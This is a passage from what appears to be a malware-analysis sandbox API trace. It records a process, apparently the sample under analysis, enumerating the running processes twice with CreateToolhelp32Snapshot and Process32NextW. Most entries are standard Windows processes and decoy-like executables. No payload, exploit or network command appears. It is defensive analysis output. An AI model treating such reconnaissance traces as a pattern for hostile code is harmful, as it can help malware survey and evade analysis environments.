returned 1 [0145.008] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.009] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0145.010] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.011] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0145.012] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0145.012] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0145.014] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0145.014] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.015] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.016] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.017] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.017] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.018] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0145.019] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.019] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.020] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0145.021] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.022] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0145.024] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0145.025] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0145.026] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0145.027] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.028] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0145.029] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0145.031] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0145.032] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0145.033] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0145.034] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0145.035] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0145.036] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0145.038] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 
| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0145.039] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0145.041] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0145.042] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0145.070] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0145.071] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0145.072] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0145.074] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0145.075] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0145.077] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0145.078] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0145.079] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0145.080] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0145.081] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.082] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0145.083] CloseHandle (hObject=0xc4) returned 1 [0145.083] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0145.088] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.089] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0145.090] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0145.091] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.091] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0145.092] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.093] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0145.094] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0145.095] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0145.096] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0145.097] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.097] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.098] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.099] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.100] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.101] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0145.102] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.102] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.103] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0145.105] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.153] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0145.154] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0145.156] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0145.157] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0145.158] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.160] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0145.161] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0145.162] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0145.163] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0145.164] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0145.165] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0145.167] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0145.168] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0145.169] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0145.170] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0145.172] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0145.173] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0145.174] Process32NextW (in: 